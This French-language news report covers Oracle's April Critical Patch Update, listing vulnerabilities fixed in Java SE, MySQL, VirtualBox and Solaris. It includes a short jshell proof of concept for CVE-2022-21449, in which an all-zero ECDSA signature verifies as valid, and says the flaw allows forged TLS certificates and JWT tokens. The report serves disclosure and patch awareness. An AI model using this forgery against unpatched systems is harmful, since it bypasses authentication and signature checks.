La société Oracle a publié une mise à jour planifiée de ses produits (Mise à jour de correctifs critiques), visant à remédier à des problèmes et vulnérabilités critiques. Dans la mise à jour d'avril, 520 vulnérabilités ont été corrigées au total.
Certaines préoccupations :
- 6 problèmes de sécurité dans Java SE. Toutes les vulnérabilités peuvent être exploitées à distance sans authentification, et concernent des environnements permettant l'exécution de code non fiable. Deux problèmes sont classés au niveau de gravité 7.5. Les vulnérabilités ont été corrigées dans les versions Java SE 18.0.1, 11.0.15 et 8u331.
Un des problèmes (CVE-2022-21449) permet de générer une fausse signature numérique ECDSA en utilisant des paramètres nuls pour sa génération (si les paramètres sont nuls, la courbe va à l'infini, donc les valeurs nulles sont expressément interdites dans les spécifications). Les bibliothèques Java ne vérifiaient pas la nullité des paramètres ECDSA, et donc lors du traitement des signatures avec des paramètres nuls, Java les considérait toutes comme valides.
Cela inclut la vulnérabilité pouvant être utilisée pour générer de fausses des certificats TLS, qui seront acceptées par Java comme correctes, ainsi que pour contourner l'authentification via WebAuthn et créer de fausses signatures JWT et des tokens OIDC. En d'autres termes, la vulnérabilité permet de générer des certificats et signatures universels, qui seront acceptés et perçus comme valides dans les gestionnaires Java utilisant les classes standards java.security.*. Le problème apparaît dans les branches Java 15, 16, 17 et 18. Un exemple de génération de faux certificats est disponible. jshell> import java.security.* jshell> var keys = KeyPairGenerator.getInstance("EC").generateKeyPair() keys == java.security.KeyPair@626b2d4a jshell> var blankSignature = new byte[64] blankSignature == byte[64] { 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, … , 0, 0, 0, 0, 0, 0, 0, 0 } jshell> var sig = Signature.getInstance("SHA256WithECDSAInP1363Format") sig == Signature object: SHA256WithECDSAInP1363Format jshell> sig.initVerify(keys.getPublic()) jshell> sig.update("Hello, World".getBytes()) jshell> sig.verify(blankSignature) $8 == true
- 26 vulnérabilités dans le serveur MySQL, dont deux peuvent être exploitées à distance. Les problèmes les plus graves, liés à l'utilisation d'OpenSSL et de protobuf, sont classés au niveau de gravité 7.5. Les vulnérabilités moins critiques concernent l'optimiseur, InnoDB, la réplication, le plugin PAM, DDL, DML, FTS et la journalisation. Les problèmes ont été corrigés dans les versions MySQL Community Server 8.0.29 et 5.7.38.
- 5 vulnérabilités dans VirtualBox. Les problèmes ont reçu un niveau de danger allant de 7.5 à 3.8 (la vulnérabilité la plus grave ne se manifeste que sur la plateforme Windows). Les vulnérabilités ont été corrigées dans la mise à jour VirtualBox 6.1.34.
- 6 vulnérabilités dans Solaris. Les problèmes concernent le noyau et les utilitaires. Le problème le plus grave dans les utilitaires a été évalué à un niveau de danger de 8.2. Les vulnérabilités ont été corrigées dans la mise à jour Solaris 11.4 SRU44.
Source : opennet.ru
